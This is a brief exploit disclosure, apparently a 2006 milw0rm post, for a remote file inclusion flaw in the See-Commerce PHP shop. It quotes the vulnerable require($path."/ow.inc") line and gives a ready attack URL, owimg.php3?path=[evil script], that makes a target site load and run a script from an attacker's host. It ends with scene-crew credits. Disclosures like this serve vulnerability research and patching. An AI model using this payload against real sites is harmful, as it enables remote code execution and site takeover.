18 lines
No EOL
335 B
Text
18 lines
No EOL
335 B
Text
See-Commerce Remote File Inclusion
|
|
|
|
CreW: ToXiC
|
|
|
|
Bug Found by Drago84
|
|
|
|
Source Code:
|
|
http://freshmeat.net/redir/seecommerce/14016/url_zip/sc-1.0.625.zip
|
|
|
|
Problem Is:
|
|
require($path."/ow.inc");
|
|
|
|
Page Affect:
|
|
http://[site]/[see-commerce directory]/owimg.php3?path=[evil script]
|
|
|
|
Greatz : Str0ke
|
|
|
|
# milw0rm.com [2006-08-09] |